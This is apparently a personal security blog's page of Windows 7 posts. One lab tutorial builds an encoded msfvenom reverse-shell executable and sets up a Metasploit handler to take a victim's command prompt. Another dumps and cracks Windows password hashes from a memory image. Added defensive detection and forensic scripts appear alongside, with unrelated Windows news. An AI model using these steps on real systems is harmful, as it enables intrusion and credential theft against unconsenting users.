Showing posts with label windows 7.

Tuesday, July 12, 2016

Windows 7 Hacked @ Kali Linux - msfvenom

This post gives you a step-by-step way to get a shell (command terminal) of a victim user on Windows 7 from another PC running Kali Linux. The setup scenario is as seen in the screenshots below, in a VirtualBox environment:

KALI LINUX : IP Address eth1 : 192.168.1.7
Windows 7 Ultimate Machine : IP Address : 192.168.1.8
Pinging from Kali Linux Machine to Windows 7 Machine
Pinging from Windows 7 to Kali Linux Machine
msfvenom is a combination of msfpayload and msfencode, putting both of these tools into a single Framework instance; msfvenom replaced both msfpayload and msfencode as of June 8th, 2015. Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tool. Now go to the Kali terminal and execute the following command:

-p windows/shell/reverse_tcp designates the payload we want to embed (a plain command shell rather than meterpreter; it must match the payload set on the handler below)
LHOST designates the local host (the Kali machine the connection comes back to)
LPORT designates the port we want to listen on
-x designates the template executable we want to use and the path to it (not used in the command below)
-e x86/shikata_ga_nai designates the encoder we want to use
-f exe designates we want to create an executable (.exe)
-o /tmp/anupam.exe designates the name and path of the file created

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.7 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/anupam.exe
followed by this set of commands:

root@kali:~# file /tmp/anupam.exe
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > show options
msf exploit(handler) > set payload windows/shell/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 192.168.1.7
msf exploit(handler) > set LPORT 3333
msf exploit(handler) > exploit

 
Now you need to apply your skills to get the file (anupam.exe in this case) onto the Windows machine. In my case, for example, I have placed it on the desktop as seen below:
The moment anupam.exe is clicked and executed on the Windows machine, we get the shell on the Kali Linux machine as seen below:
Here you have the C:\ prompt from the Windows machine :-)
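As an added, defender-side example (not code from the original post), the scenario above has a simple network signature: an executable launched from a user-writable folder such as the Desktop opens an outbound TCP connection to a port no ordinary desktop application uses (here the handler's LPORT, 3333). The Python below triages constructed key="value" connection-event lines on that rule. The log format, the COMMON_PORTS allow-list, the path fragments and the sample events are assumptions made for this example, not output of any particular tool.

```python
"""Added example (not from the original post): flag outbound TCP connections made by
executables living in user-writable folders to ports outside a small allow-list.
The key="value" line format and all sample events below are constructed."""
import ipaddress
import re
from dataclasses import dataclass

# Ports ordinary desktop software legitimately talks to. Assumption: tune per estate.
COMMON_PORTS = {53, 80, 88, 135, 139, 389, 443, 445, 636, 3389}

# Path fragments where an unprivileged user can drop an executable (assumed list).
USER_WRITABLE = ("\\users\\", "\\desktop\\", "\\downloads\\", "\\temp\\", "\\appdata\\")

LINE_RE = re.compile(r'(\w+)="([^"]*)"')


@dataclass(frozen=True)
class Finding:
    image: str
    dst: str
    port: int
    reason: str


def parse_event(line: str) -> dict:
    """Turn one key="value" log line into a dict of its fields."""
    return dict(LINE_RE.findall(line))


def is_user_writable(path: str) -> bool:
    """True when the image path contains one of the user-writable fragments."""
    p = path.lower().replace("/", "\\")
    return any(frag in p for frag in USER_WRITABLE)


def triage(lines):
    """Return a Finding for every initiated TCP connection from a user-writable
    image to a port that is not in COMMON_PORTS."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("Protocol", "tcp").lower() != "tcp" or ev.get("Initiated") != "true":
            continue  # only outbound TCP connections are in scope
        port = int(ev["DestinationPort"])
        image, dst = ev["Image"], ev["DestinationIp"]
        if is_user_writable(image) and port not in COMMON_PORTS:
            scope = "private" if ipaddress.ip_address(dst).is_private else "public"
            findings.append(Finding(image, dst, port,
                                    f"user-writable image -> uncommon port ({scope} destination)"))
    return findings


# Constructed events: a browser, an updater on a common port, the post's scenario
# (anupam.exe on the Desktop connecting back to 192.168.1.7:3333), and an inbound one.
SAMPLE_EVENTS = [
    'Image="C:\\Program Files\\Mozilla Firefox\\firefox.exe" DestinationIp="93.184.216.34" DestinationPort="443" Protocol="tcp" Initiated="true"',
    'Image="C:\\Users\\anupam\\AppData\\Local\\Updater\\update.exe" DestinationIp="10.0.0.5" DestinationPort="443" Protocol="tcp" Initiated="true"',
    'Image="C:\\Users\\anupam\\Desktop\\anupam.exe" DestinationIp="192.168.1.7" DestinationPort="3333" Protocol="tcp" Initiated="true"',
    'Image="C:\\Windows\\System32\\svchost.exe" DestinationIp="192.168.1.7" DestinationPort="3333" Protocol="tcp" Initiated="false"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"ALERT {f.image} -> {f.dst}:{f.port}: {f.reason}")
```

Only the Desktop executable is reported; the updater under AppData is ignored because 443 is on the allow-list, which is exactly the trade-off such a rule makes and why the port list has to be reviewed for the environment it runs in.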

Sunday, October 04, 2015

Extracting Username/Passwords from RAM Dump : Volatility Framework makes it Easy

1. For those of you who started reading this post because of the tempting title claiming to extract usernames/passwords from a RAM dump, I must assure you it is easily possible in a few steps using the Volatility Framework. In the post ahead I have a RAM dump of a Windows 7 OS, and I have been able to extract the user names and passwords of its users in three simple steps using Volatility. Well, I will quickly get to the steps with screenshots:

Setup Required

- Volatility Framework installed
[How to install: http://anupriti.blogspot.in/2015/09/volatility-advanced-memory-forensics.html]

- A RAM dump taken from Windows
[How to take a RAM dump: para 3 of http://anupriti.blogspot.in/2015/09/volatility-command-using-imageinfo-to.html]

Here I am basically using two commands, i.e. hivelist and hashdump.

HIVELIST


Hivelist is used to locate the virtual addresses of registry hives in memory, and the full paths to the corresponding hive on disk.

Command Usage

python vol.py --profile=Win7SP0x86 -f /home/cuckoo/Desktop/windows_7_ramdump.raw hivelist

You get output similar to that seen below.

Note the virtual address for SYSTEM as highlighted.

Note the virtual address for SAM as highlighted.

HASHDUMP


Hashdump is used to extract and decrypt cached domain credentials stored in the registry.

Command Usage

To use hashdump, pass the virtual address of the SYSTEM hive as -y and the virtual address of the SAM hive as -s, as shown below:

python vol.py --profile=Win7SP0x86 hashdump -f /home/cuckoo/Desktop/windows_7_ramdump.raw -y 0x8901a360 -s 0x8faff008

Hashdump output seen with user names and NTLM hashes.

As we see in the screenshot above, we have been able to extract the user names stalin, VOLA and TILITY with the hashes of their passwords against their names. Now we will crack these hashes.
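The two manual steps above (read the SYSTEM and SAM virtual addresses off the hivelist output, then pass them as -y and -s to hashdump) can be scripted. The Python below is an added example, not code from the post or from the Volatility project: it parses hivelist output in the three-column layout Volatility 2 prints and assembles the hashdump argv. The sample hivelist text is constructed; only the two addresses 0x8901a360 (SYSTEM) and 0x8faff008 (SAM), the image path and the profile are taken from the post. It refuses to guess when a hive is missing or matched more than once.

```python
"""Added example (not from the post or from Volatility): pick the SYSTEM and SAM hive
virtual addresses out of `hivelist` output and build the `hashdump` command line.
The hivelist text below is constructed in the layout Volatility 2 prints."""
import re
import shlex

# One hivelist row: virtual address, physical address, hive name/path.
ROW_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)\s+(.+?)\s*$")


def parse_hivelist(text: str) -> dict:
    """Map each hive path to its (virtual, physical) address pair; header and
    separator lines do not start with 0x and are skipped."""
    hives = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            hives[m.group(3)] = (m.group(1), m.group(2))
    return hives


def find_hive(hives: dict, suffix: str) -> str:
    """Return the virtual address of the one hive whose path ends with `suffix`
    (case-insensitive). Raise instead of guessing if it is missing or ambiguous."""
    matches = [virt for path, (virt, _phys) in hives.items()
               if path.lower().endswith(suffix.lower())]
    if len(matches) != 1:
        raise LookupError(f"expected exactly one hive ending in {suffix!r}, found {len(matches)}")
    return matches[0]


def hashdump_command(hives: dict, image: str, profile: str) -> list:
    """argv for `vol.py hashdump` with -y (SYSTEM) and -s (SAM) filled in."""
    system = find_hive(hives, "\\SYSTEM")   # shown by hivelist as \REGISTRY\MACHINE\SYSTEM
    sam = find_hive(hives, "\\SAM")         # shown as \SystemRoot\System32\Config\SAM
    return ["python", "vol.py", f"--profile={profile}", "-f", image,
            "hashdump", "-y", system, "-s", sam]


# Constructed hivelist output; the two highlighted addresses match the post's screenshots.
SAMPLE_HIVELIST = """\
Volatility Foundation Volatility Framework 2.4
Virtual    Physical   Name
---------- ---------- ----
0x8fa2b008 0x1f5b8008 \\SystemRoot\\System32\\Config\\SECURITY
0x8faff008 0x1e0fa008 \\SystemRoot\\System32\\Config\\SAM
0x8901a360 0x0ba1a360 \\REGISTRY\\MACHINE\\SYSTEM
0x8fc6e008 0x1f0a3008 \\??\\C:\\Users\\stalin\\ntuser.dat
"""

if __name__ == "__main__":
    argv = hashdump_command(parse_hivelist(SAMPLE_HIVELIST),
                            "/home/cuckoo/Desktop/windows_7_ramdump.raw", "Win7SP0x86")
    print(shlex.join(argv))
```

The printed line is the same hashdump invocation the post types by hand; the suffix match is deliberately strict so a second SAM-like hive name (for example from a mounted image) aborts rather than silently picking the wrong address.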

DECRYPTING NTLM hash

Now comes cracking the hash we got from hashdump above (an NTLM hash is not decrypted in the literal sense; the password is recovered by lookup or brute force). Hashes can be cracked using John the Ripper, rainbow tables, etc. There is no need to install these crackers separately: simply google for online NTLM decryptors and you will get the password too. I used this site: http://www.hashkiller.co.uk/ntlm-decrypter.aspx

Screenshots below:

Password extracted is test_1234

Password extracted is test_123

Password extracted is test

So in all, two terminal commands running Volatility hivelist and hashdump, followed by cracking the hashes online, will give you the usernames and passwords from the RAM dump. Any queries, questions or advice are most welcome. Thanks

Sunday, September 27, 2015

Volatility Framework Command : Using pslist - pstree - psscan to identify process details from mem dump

This post shares an example of running three Volatility terminal commands: pslist, pstree and psscan.

Before I proceed, I assume that you have installed Volatility on your Linux system (in my case Ubuntu; installation is explained in my earlier post at http://anupriti.blogspot.in/2015/09/volatility-advanced-memory-forensics.html) and that you have a RAM dump of the OS you wish to analyse. In my case I have taken a RAM dump of a Windows 7 OS as explained at http://anupriti.blogspot.in/2015/09/volatility-command-using-imageinfo-to.html

Usage as follows :

pslist

The pslist command is useful in any preliminary forensic inquiry to find out which processes were running on the PC at the likely time of the incident. It lists the processes of a system, and it does not detect hidden or unlinked processes. The pslist module uses the same algorithm as the tasklist command executed on the live computer, and Windows Task Manager uses the same approach as well: pslist walks the linked list of active process structures that the Windows kernel maintains. The screenshot below shows Task Manager on the Windows PC I am using for the test. I then took a fresh dump at that time and analysed it with Volatility on Ubuntu to find the process details, which come out the same, as seen in the screenshots below:

(Windows Task Manager as seen in the Windows OS)

The command usage at the terminal goes like this:

vol.py --profile=Win7SP0x86 -f windows_memory.raw pslist

(pslist output)

The columns display the offset, process name, process ID, the parent process ID, number of threads, number of handles, and date/time when the process started. The offset is a virtual address by default, but the physical offset can be obtained with the -P switch as seen in the command below with screenshot.

vol.py --profile=Win7SP0x86 -f windows_memory.raw pslist -P

(Output with -P switch)

pstree

The pstree command is used to view the process listing in tree form. It enumerates processes using the same technique as pslist, so it will also not show hidden or unlinked processes. Child processes are indicated using indentation and periods. Screenshot of the output and syntax below:

vol.py --profile=Win7SP0x86 -f windows_memory.raw pstree


psscan

psscan is used to enumerate processes by pool tag scanning and can find processes that previously terminated (inactive) and processes that have been hidden or unlinked by a rootkit. Syntax and screenshot of output as follows:

vol.py --profile=Win7SP0x86 -f win7.dmp psscan

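As an added example (not code from the post or from Volatility), the Python below ties the three commands together: it parses constructed pslist and psscan output in the column layout Volatility 2 prints, renders the parent/child tree the way pstree does (one period per level of depth), and reports the processes psscan found that pslist did not. Whether such a process carries an exit time is what separates an ordinary terminated process from one that was unlinked from the active-process list. All process rows, offsets, names and timestamps are constructed for this example.

```python
"""Added example (not from the post or from Volatility): cross-check pslist against
psscan and render a pstree-style view. All sample rows below are constructed."""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Proc:
    name: str
    pid: int
    ppid: int
    exited: Optional[str]  # exit timestamp if psscan printed one, else None


def parse_pslist(text: str) -> Dict[int, Proc]:
    """pslist columns: Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start [Exit]."""
    procs = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < 8 or not f[0].startswith("0x"):
            continue  # header / separator lines
        procs[int(f[2])] = Proc(f[1], int(f[2]), int(f[3]), None)
    return procs


def parse_psscan(text: str) -> Dict[int, Proc]:
    """psscan columns: Offset(P) Name PID PPID PDB Time-created [Time-exited].
    Each timestamp is three tokens ('YYYY-MM-DD HH:MM:SS UTC+0000')."""
    procs = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < 8 or not f[0].startswith("0x"):
            continue
        exited = " ".join(f[8:11]) if len(f) >= 11 else None
        procs[int(f[2])] = Proc(f[1], int(f[2]), int(f[3]), exited)
    return procs


def pstree(procs: Dict[int, Proc]) -> List[str]:
    """Render lines the way pstree does: one '.' per depth level, then name (PID).
    Processes whose parent is absent from the listing are printed as roots."""
    children: Dict[int, List[Proc]] = {}
    for p in procs.values():
        children.setdefault(p.ppid, []).append(p)
    out: List[str] = []
    seen = set()

    def walk(p: Proc, depth: int) -> None:
        if p.pid in seen:  # guard against PID-reuse cycles in stale data
            return
        seen.add(p.pid)
        out.append("." * depth + f"{p.name} ({p.pid})")
        for child in sorted(children.get(p.pid, []), key=lambda c: c.pid):
            walk(child, depth + 1)

    for root in sorted((p for p in procs.values() if p.ppid not in procs), key=lambda r: r.pid):
        walk(root, 0)
    return out


def psscan_only(pslist: Dict[int, Proc], psscan: Dict[int, Proc]) -> Dict[str, List[Proc]]:
    """Processes psscan found but pslist did not, split by whether they exited."""
    result: Dict[str, List[Proc]] = {"terminated": [], "unlinked": []}
    for pid, p in psscan.items():
        if pid not in pslist:
            result["terminated" if p.exited else "unlinked"].append(p)
    return result


# Constructed listings. psscan additionally carries a cmd.exe that exited and a
# hidden.exe with no exit time that is absent from the active-process list.
SAMPLE_PSLIST = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
---------- -------------------- ------ ------ ------ -------- ------ ------ ----------------------------
0x84120868 System                    4      0     78      512 ------      0 2015-09-27 10:00:01 UTC+0000
0x8412e9c8 smss.exe                256      4      2       29 ------      0 2015-09-27 10:00:03 UTC+0000
0x8512e9c8 wininit.exe             384    256      3       75      0      0 2015-09-27 10:00:05 UTC+0000
0x8513d030 services.exe            488    384      9      210      0      0 2015-09-27 10:00:06 UTC+0000
0x85301d40 explorer.exe           1432   1396     26      800      1      0 2015-09-27 10:01:10 UTC+0000
0x8540a7b8 notepad.exe            2012   1432      1       60      1      0 2015-09-27 10:05:42 UTC+0000
"""

SAMPLE_PSSCAN = """\
Offset(P)  Name             PID   PPID PDB        Time created                 Time exited
---------- ---------------- ----- ---- ---------- ---------------------------- ----------------------------
0x01f20868 System               4    0 0x00185000 2015-09-27 10:00:01 UTC+0000
0x01f6a9c8 smss.exe           256    4 0x3e4a1020 2015-09-27 10:00:03 UTC+0000
0x02012e30 wininit.exe        384  256 0x3e4b2040 2015-09-27 10:00:05 UTC+0000
0x0202d030 services.exe       488  384 0x3e4c3060 2015-09-27 10:00:06 UTC+0000
0x02201d40 explorer.exe      1432 1396 0x3e5a0080 2015-09-27 10:01:10 UTC+0000
0x0230a7b8 notepad.exe       2012 1432 0x3e5b00a0 2015-09-27 10:05:42 UTC+0000
0x1e3c2d40 cmd.exe           2240 1432 0x3e5c00c0 2015-09-27 10:06:30 UTC+0000 2015-09-27 10:07:02 UTC+0000
0x1f01a5c8 hidden.exe        1880  488 0x3e6a10e0 2015-09-27 10:03:15 UTC+0000
"""

if __name__ == "__main__":
    print("\n".join(pstree(parse_pslist(SAMPLE_PSLIST))))
    for kind, procs in psscan_only(parse_pslist(SAMPLE_PSLIST), parse_psscan(SAMPLE_PSSCAN)).items():
        for p in procs:
            print(f"{kind}: {p.name} pid={p.pid} ppid={p.ppid} exited={p.exited}")
```

In a real investigation the "unlinked" bucket is the one to chase first: a process with no exit time that the active list does not know about is the textbook DKOM-style hiding psscan is meant to catch, while the "terminated" bucket is normal churn that still gives useful timeline data.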


Friday, September 25, 2015

Volatility Command : Using IMAGEINFO to find type of System Image

1. After installing Volatility, as detailed in my post here, next we need to start exploiting the power of Volatility. In my next posts I will decipher the usage of the general Volatility commands. To start with, I begin with the IMAGEINFO command, whose output tells you the suggested profile that you should pass as the parameter to --profile=PROFILE; there may be more than one profile suggestion if profiles are closely related. One can figure out which one is more appropriate by checking the "Image Type" field, which is blank for Service Pack 0 and filled in for other Service Packs.

2. The next few screenshots show how I took the RAM dump of Windows 7 with the help of the DumpIt utility that I downloaded from here. DumpIt vastly simplifies memory acquisition: effectively it combines win32dd and win64dd into one tool and is so simple to use that even a non-technical user could do an acquisition from a USB key. The dump can then be analyzed using Volatility.

3. Firstly, I show you the Windows screen here with the DumpIt file on the desktop, which I simply click once to get the dump.
I get the following screen and I click YES.
A further yes at the command prompt screen starts the dump as seen below:
I get a success message here and the dump is ready for analysis.
The .raw file that is generated, I move to Ubuntu, which has Volatility installed, for analysis. At the terminal I type the command:
python vol.py -f file_name.raw imageinfo


and in a few minutes I get the profile suggested as Win7SP0x86 / Win7SP1x86

Wednesday, July 30, 2014

Setting up your Virtual Lab : Two Machines for SET

1. This post will be useful for those looking to set up a virtual lab on their laptops/PCs that can be used to play with Backtrack/Kali Linux and similar images. Here I am sharing exact screenshots of the configuration required to set up two machines that access the internet independently and at the same time can ping each other on a local LAN setup... which can subsequently be used to work with SET (Social Engineering Toolkit) as discussed in my last post. I have two machines here: a Kali Linux machine and a Windows 7 machine.

2. Both have been set up with two NICs each and configured as shown below:

(Windows 7 Machine NIC 1 Setting)

(Windows 7 Machine NIC 2 Setting)

(Kali Machine NIC 1 Setting)

(Kali Machine NIC 2 Setting)

(IPCONFIG output at Windows machine)

(ifconfig output at Kali machine)

(Ping to Windows Machine)

(Ping to Kali Machine)

(Kali Access to Internet)

(Windows Access to Internet)


Monday, April 15, 2013

HIT WICKET & OUT- Microsoft Genuine Patch crashes WINDOWS 7


1. This is some news from the corridors of Microsoft: a genuine MS patch released for Windows 7 crashes it. The patch in dispute is "Microsoft Security Bulletin MS13-036".

2. Redmond, on Microsoft's Security Response blog, blamed the glitch on conflicts with third-party software:

We are aware that some of our customers may be experiencing difficulties after applying security update 2823324, which we provided in security bulletin MS13-036 on Tuesday, April 9. We’ve determined that the update, when paired with certain third-party software, can cause system errors. As a precaution, we stopped pushing 2823324 as an update when we began investigating the error reports, and have since removed it from the download centre.

Contrary to some reports, the system errors do not result in any data loss nor affect all Windows customers. However, all customers should follow the guidance that we have provided in KB2839011 to uninstall security update 2823324 if it is already installed.

3. That means Windows 7 users should uninstall the security patch Microsoft issued on Tuesday because some PCs failed to restart after applying the update..... :-). Microsoft has advised users of Windows 7 and Windows Server 2008 R2 to roll back the patch.

4. More about the patch here. Thanks http://www.theregister.co.uk/security/

Monday, April 16, 2012

Windows 7 Hacked @ BACKTRACK



Nothing new for the active cyber security community... but since I had recently recorded a screencast I thought of uploading it for everyone..... This is my second "hands on" on a Windows machine after I attempted XP last year at http://anupriti.blogspot.in/2011/10/backtrack-5-how-to-use.html

Tuesday, February 15, 2011

NOKIA & MICROSOFT : A MERGER TO READ ABOUT

1. In today's shrinking world, when we hear of a merger of giants... it's part of normal breaking news which hardly draws rolling eyeballs & pop-ups.... But this one is slightly different, or if not different it is really BIGGGGGGG. This is about the merger of the fantabulous phone hardware maker NOKIA and the operating system giant MICROSOFT coming together to produce phones and try to beat the rest of the market?

2. The deal, which was already doing the rumour rounds, went much further than expected..... in effect, Nokia is handing over its future - in smartphones at least - to Microsoft and Windows Phone 7. That means goodbye & happy journey, Symbian. So can the combo really become the third horse in the race, giving Apple and Android a run for their money? I have my doubts....

3. The crux of the acquisition, listed pointwise below:

- Nokia to embrace Windows Phone as its principal smartphone strategy.
- Nokia to contribute its expertise on hardware design and language support.
- Both would closely collaborate on joint marketing initiatives.
- Bing would power Nokia's search services (nobody's guess!!!).
- Nokia Maps would be a core part of Microsoft's mapping services.

4. Just to mention, a year earlier when this merger was being talked about, it was once declared an April Fools rumour. And now, about a year later, it is on the official Microsoft site. Thanks Microsoft site for the info

Tuesday, October 19, 2010

Service Packs & Infection Rates

1. First it was Windows XP... then SP1 (Service Pack 1)... followed by SP2, SP3... then Vista SP1, SP2 and now Windows 7. How the upgrades in these packs have been reducing infection rates is briefly reflected in stats from the Microsoft Security Intelligence Report:

- The infection rate for Windows XP with SP3 is less than half of that for SP2 and less than a third of that for SP1.

- Windows Vista SP2 has a lower infection rate than SP1, which in turn is about 50% lower than Windows Vista Basic.

- In the case of server operating systems, the infection rate for Windows Server 2008 with SP2 is about 20% less than its predecessor, i.e. Windows Server 2008 RTM.

Monday, October 05, 2009

MY WINDOWS 7 HOUSE PARTY PACK : THANK YOU MICROSOFT

1. Two months back I had registered to host a house party on the occasion of the launch of Windows 7 ( :-)... the secret known to beta testers)... the next generation Windows OS, after answering a few FAQs on Windows 7, without realising that I would end up as a winner of the signature edition of the house party pack including the original Windows 7. I got the confirmation from Microsoft two weeks back...... till then I had thought of it as some spam mail.... till I got the tracker ID from DHL.... so for the last two weeks I have been waiting to get that pack of Windows 7.... and finally today I got the pack...... and it looks like this....... grrrrrrrrrrrrrrrrrr8... thanks Microsoft for the box..... so happy to use a genuine edition of a Windows OS for the first time!!!!! ha ha ha!!!!! that too in my name, direct from the US of A.

...thanks Microsoft again.... and let's meet you guys at the webinar the day after!!!!

Friday, May 29, 2009

WINDOWS 7 : MY FIRST HANDSHAKE-4 - THE SNIPPING TOOL

1. This one is surely going to be one of the most hit features of Windows 7. This feature allows users to capture, edit and share information from web and local pictures (images). Snipping allows you to send the captured image/text to anyone using the options listed on the menu. This allows the user to save the selected portion in any of the formats PNG, GIF, JPEG & MHT.

2. To explain it in a simpler way: this is what we used to do earlier, till Vista, when we wanted a screenshot. Four steps:

- Press print screen
- Go to Paint Brush
- Do paste
- Save in desired format


3. This is now replaced by one click on the Snipping Tool... all steps done in one click. No print screen, no opening of Paint, no paste, no saving. So time saved is time gained.




Thursday, May 28, 2009

WINDOWS 7 : MY FIRST HANDSHAKE-2

1. Continuing further exploring Windows 7 was a good experience and it has started looking promising to me.

2. Windows Explorer: Windows Explorer has also been modified. New command bar, new left-side pane containing Libraries, Favorites, etc., new Details pane, a few new options in the "View" menu like Content, and at last a resizable search bar.

3. Installation did not ask many questions nor did it take much time... maybe 30-35 minutes... and I was on the desktop.

4. The desktop context menu is similar to the earlier OS but adds 2 new choices, which are:
a. Share with
b. Gadgets

5. The Control Panel window has also been redesigned. The left sidebar takes less space and resizes itself whenever any control panel item is opened in the window, which provides more space.

6. Calculator is a thing I have left for now, as it needs to be worked on with a few examples of the new features. For now I would just add that PROGRAMMER and STATISTICS are two new menu options that have been added.

7. Outlook Express is not seen so far and has been done away with!!!!

8. More will be added as I explore more!!!!!!!

Wednesday, May 27, 2009

WINDOWS 7 : MY FIRST HANDSHAKE-1

1. In further exploring Windows 7, a few more facts that have come to my knowledge include the following:

2. Minimum configuration :

• GHz processor (32- or 64-bit)
• 1 GB of RAM (32-bit); 2 GB of RAM (64-bit)
• 16 GB of available disk space (32-bit); 20 GB of available disk space (64-bit)
• DirectX 9 graphics device with WDDM 1.0 or higher driver

3. Task bar Classic style is out.

4. Sticky Notes is a new permanent feature which was earlier an optional gadget in Vista. Once clicked, it gives a little yellow notepad where one can type a short note for one's own reference and mailing. A pic of the sticky note yellow window from my laptop is shown inset.


5. A lot has been put into the renovation and refurbishment of the taskbar. The taskbar at the bottom of the screen is what one uses to launch programs and switch between them. In Windows 7 one can pin any program to the taskbar so it's always just a click away, and icons can be rearranged just by clicking and dragging. Hovering over the icons makes thumbnails appear of every file or window that is open in that program. But the overall effect is not looking so appealing to me so far.

6. Speed of reaching the desktop at startup, and of reaching the off state at shutdown, is relatively much, much faster.

WINDOWS 7 : MY FIRST HANDSHAKE



1. After a long time, about 4 months, in which I didn't get much time to work on this, and after 3 unsuccessful attempts... I mean 3 infected downloads.... I am finally writing this from the new beta OS Windows 7...... yes, the successor to Windows Vista!!!!!!!



2. Till now I have been able to load the chipset driver, graphics card driver, Office 2007 and F-Secure Antivirus Internet edition for Windows 7. No compatibility issues and the first impression is generally OK so far...... one bad thing is perhaps that the Windows classic style has been done away with!!!!


3. In a few days more... I will be writing more about what's new and different in Windows 7 when compared to Vista!!!!!!!!